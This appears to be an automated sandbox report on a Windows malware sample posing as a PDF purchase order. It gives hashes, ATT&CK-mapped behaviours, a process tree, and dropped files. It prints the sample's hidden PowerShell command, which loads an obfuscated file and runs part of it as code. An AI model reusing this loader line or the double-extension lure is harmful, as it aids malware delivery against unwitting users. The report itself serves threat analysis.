Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17-08-2024 14:13
Static task: static1
Behavioral task: behavioral1
Sample: PURCHASE ORDER 03.05.2024.PDF.exe
Resource: win7-20240729-en
General
Target: PURCHASE ORDER 03.05.2024.PDF.exe
Size: 626KB
MD5: 9be2bb8f46192a7cf7006587c0e95d54
SHA1: 9e31f25cd0c0cf37a92a61ebd87293b519da5534
SHA256: 4c614a69aebe97562d09c05c5b08db70ba7cba08f6698e5a87fc85407e2fb940
SHA512: 76140dd7bcfdb778b70c4864934016b9cbc60b4f36ece6aa671c6556f1504d38e3428102663c47ffa8346e2201078a28443a0b42be0c6b7e820f6823cab4810b
SSDEEP: 12288:naxvaBAHu5sn0ulSRNQeILTPNRLZi8s7exFe2WM:a9aBAObRNVI/PNxzxFMM
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
Runs PowerShell and hides the display window.
  pid    Process
  812    powershell.exe

Drops file in Windows directory (1 IoC)
  description                    ioc                          Process
  File opened for modification   C:\Windows\albocarbon.ile    PURCHASE ORDER 03.05.2024.PDF.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
  pid    pid_target   Process        procid_target
  3296   812          WerFault.exe   90

System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description   ioc                                                           Process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   PURCHASE ORDER 03.05.2024.PDF.exe
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   powershell.exe

Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid    Process
  812    powershell.exe   (9 identical entries)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description               pid    Process
  Token: SeDebugPrivilege   812    powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid    Process                             procid_target
  PID 4680 wrote to memory of 812   4680   PURCHASE ORDER 03.05.2024.PDF.exe   90   (3 identical entries)
Processes
C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER 03.05.2024.PDF.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\PURCHASE ORDER 03.05.2024.PDF.exe"
  PID: 4680
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -windowstyle hidden "$Afmatningens=Get-Content 'C:\Users\Admin\AppData\Local\Outlaughing235\ephemeric\Antipatheticalness\Anskaffet.Sys';$Unsucculent=$Afmatningens.SubString(619,3);.$Unsucculent($Afmatningens)"
    PID: 812
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 2732
      PID: 3296
      - Program crash
C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 812 -ip 812
  PID: 4400
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 52KB
MD5: d9a344e48210c5d555312be94347270a
SHA1: 8e1957cb5f8e181411781bca9fa72f57e8d0d2b1
SHA256: e31954e86c5fadd5da5409be4c6266ac0740652f25073eb29f87d6727d0668b6
SHA512: ed1c9a1ce86f20c3eb860079067a7476b8e543c212b0fccd1e73183b6535dec74f34ece8b0225f10fd2f211af68bac6d7302c3b91e1a88d30285ad202854d853

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82